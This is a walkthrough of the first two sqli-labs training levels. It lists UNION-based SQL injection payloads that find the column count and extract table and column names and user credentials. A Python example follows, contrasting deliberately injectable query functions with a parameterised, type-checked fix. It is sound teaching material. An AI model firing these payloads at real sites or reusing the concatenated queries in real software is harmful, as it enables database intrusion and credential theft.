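sqli-labs walkthrough
Level 1
Appending ' produces an error
Appending '--+ returns a normal page
?id=-1' order by 3 --+ page loads normally
?id=-1' order by 4 --+ page errors, so the query returns 3 columns
Find the columns that are echoed back in the page: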
id=-1' union select 1,2,3--+
Get the database name:
-1' union select 1,database(),3--+
Get the table names:
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
Get the column names:
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
Get the user data:
id=-1' union select 1,group_concat(username,password),3 from users--+
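Level 2
and 1=1 page loads normally
and 1=2 produces an error
?id=-1 order by 3 page loads normally
?id=-1 order by 4 page errors, so the query returns 3 columns
Find the columns that are echoed back in the page: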
id=-1 union select 1,2,3
Get the database name:
-1 union select 1,database(),3
Get the table names:
-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
Get the column names:
-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
Get the user data:
id=-1 union select 1,group_concat(username,password),3 from users
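Why the two levels take different payloads, and what closes both, as an added example that is not part of the original walkthrough or of the sqli-labs code. It assumes Level 1 concatenates the id inside single quotes and Level 2 concatenates it unquoted, and it uses Python's sqlite3 with a constructed table in place of the lab's PHP/MySQL.

```python
import sqlite3

COLS = "SELECT id, username, password FROM users WHERE id="

def make_db():
    # Constructed in-memory stand-in for the lab's `users` table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")  # constructed sample row
    return db

def level1_vulnerable(db, user_id):
    # Assumed Level 1 shape: input is concatenated inside single quotes.
    return db.execute(COLS + "'" + user_id + "' LIMIT 0,1").fetchall()

def level2_vulnerable(db, user_id):
    # Assumed Level 2 shape: input is concatenated with no quotes (numeric context).
    return db.execute(COLS + user_id + " LIMIT 0,1").fetchall()

def lookup_hardened(db, user_id):
    # Validate the expected type, then bind the value so it is never parsed as SQL.
    try:
        uid = int(user_id)
    except ValueError:
        return []
    return db.execute(COLS + "? LIMIT 0,1", (uid,)).fetchall()

def quote_breaks_level1(db):
    # The lone quote from the first probe leaves an unterminated string literal.
    try:
        level1_vulnerable(db, "1'")
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    # "--+" in the URL decodes to "-- ", a comment that drops the trailing quote.
    probes = {"level 1": (level1_vulnerable, "-1' union select 1,2,3-- "),
              "level 2": (level2_vulnerable, "-1 union select 1,2,3")}
    for name, (vulnerable, payload) in probes.items():
        print(name, "vulnerable:", vulnerable(db, payload))
        print(name, "hardened:  ", lookup_hardened(db, payload))
    print("quote probe errors on level 1:", quote_breaks_level1(db))
```

In the vulnerable functions the echoed row is the attacker-chosen `1,2,3`; the hardened lookup returns no rows for the same input and still serves a legitimate id.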